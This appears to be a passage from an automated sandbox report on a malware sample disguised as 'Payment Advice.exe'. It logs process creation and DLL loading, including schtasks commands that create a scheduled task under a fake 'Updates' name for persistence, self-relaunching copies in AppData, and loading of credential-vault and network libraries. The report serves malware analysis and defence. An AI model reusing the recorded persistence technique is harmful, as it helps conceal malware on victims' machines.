                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
